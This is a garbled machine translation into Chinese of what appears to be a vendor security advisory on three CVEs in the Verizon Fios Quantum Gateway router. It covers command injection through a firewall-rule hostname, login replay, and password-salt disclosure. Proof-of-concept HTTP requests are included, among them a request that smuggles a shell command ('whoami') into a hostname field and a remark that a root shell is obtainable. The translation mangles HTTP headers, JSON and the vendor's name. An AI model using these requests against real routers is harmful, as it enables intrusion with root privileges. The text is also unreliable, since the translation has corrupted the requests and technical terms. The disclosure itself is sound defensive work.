Verizon Fios量子网关多个漏洞

站得住脚的发现了多个漏洞Verizon Fios量子网关。

cve - 2019 - 3914:验证命令注入

一个命令注入漏洞被发现在API的后端。这个漏洞可以利用远程实现使用root特权命令执行。攻击者必须经过身份验证的设备的管理web应用程序以执行命令注入。

这个问题存在由于防火墙访问控制规则的方式处理。具体来说,漏洞可以通过添加一个访问控制规则触发网络对象的主机名。

例如,如果一个网络对象添加主机名的“whoami”(注意引号),和这个对象用于防火墙的访问控制规则,‘whoami命令将被执行。

下面是日志条目/ chroot / mnt /日志/用户。注意,“whoami”纳入iptables命令。

用户。犯错< 11 > bhr4:防火墙。AccessControlRulesLog:未能删除规则:iptables - AC_B_1_NWOBJ_1 - s - j AC_B_1_SERVICES whoami

下面是一个概念证明的HTTP请求。请注意,该命令的结果将不退还。请注意,有可能获得一个root shell。

POST / api /防火墙/ accesscontrol HTTP / 1.1主持人:192.168.1.1连接:维生接受编码:gzip、缩小接受:* / * - agent: python-requests / 2.11.1 X-XSRF-TOKEN: 1 eaa16ee9264d388574253cfd0a2357e8c47718f9b4b8ac43b93c1571e0cdcda8ad3ad368389254bf4851ed68b3cc264a03003b477f59f33dc35c725fd0f6c89饼干:会话= 944817705;XSRF-TOKEN内容长度= 1 eaa16ee9264d388574253cfd0a2357e8c47718f9b4b8ac43b93c1571e0cdcda8ad3ad368389254bf4851ed68b3cc264a03003b477f59f33dc35c725fd0f6c89: 373 - type: application / json {“blockRule”:真的,“安排”:“”,“networkObjects”:[{“规则”:[{“主机名”:“whoami”,“networkObjType”: 4}],“类型”:3,“名字”:“史”}],“启用”:真的,“主机”:[],“哪些行程”:{},“服务”:[]}

cve - 2019 - 3915:登录重播

登录过程容易重播。鉴于HTTP不是执行,攻击者可以拦截一个登录请求,随后回放它进入路由器的管理web界面。

当一个用户试图登录,咸sha - 512密码散列发布。这都是攻击者需要登录。例如,登录请求看起来像这样:

POST / api /登录HTTP / 1.1主持人:192.168.1.1 user - agent: Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.13;房车:Firefox 63.0)壁虎/ 20100101 / 63.0接受:application / json文本/平原,* / *接收语言:en - us, en; q = 0.5接受编码:gzip、缩小推荐人:http://192.168.1.1/ - type: application / json; charset = utf - 8内容长度:143连接:紧密饼干:测试{“密码”:“5 e619e19824b1072f89ff309e3896b1b6dd31aebfab1698b2662d97352d9da9fbdbf7c165239a2214bdf9ae512821e78875a1b515bd4140ec919dda201f1001e”}

cve - 2019 - 3916:密码盐信息披露

未经过身份验证的攻击者能够检索密码盐的值,只需在web浏览器中访问URL。鉴于固件并不强制使用HTTPS,对攻击者来说是可行的捕获(嗅)登录请求。登录请求包含一个咸密码散列(sha - 512),那么攻击者就可以执行离线字典攻击恢复原来的密码。

概念验证下面显示一个HTTP请求/响应对。注意,返回“passwordSalt”。

GET / api HTTP / 1.1主持人:192.168.1.1连接:维生cache - control:信息= 0 Upgrade-Insecure-Requests: 1用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10 _13_6) AppleWebKit / 537.36 (KHTML,像壁虎)Chrome / 70.0.3538.110 Safari 537.36接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp图像/ apng * / *; q = 0.8接受编码:gzip、缩小接收语言:en - us, en; q = 0.9饼干:测试;bhr4UI2HasToRefresh = false;bhr4HasEnteredAdvanced = true;会话=;XSRF-TOKEN =

HTTP / 1.1 401年未经授权的cache - control: no - cache - type: application / json;utf - 8字符集=内容长度:173日期:星期四,2018年12月06 13:00:40格林尼治时间服务器:lighttpd / 1.4.38 {“doSetupWizard”:假的,“requirePassword”:真的,“passwordSalt”:“6299 bfce - 1 - d56 - 4 - a6c 9 - bd8 - 352 dc9ce865c”、“isWireless”:假的,“错误”:1、“maxUsers”: 10“denyState”: 0,“denyTimeout”: 0}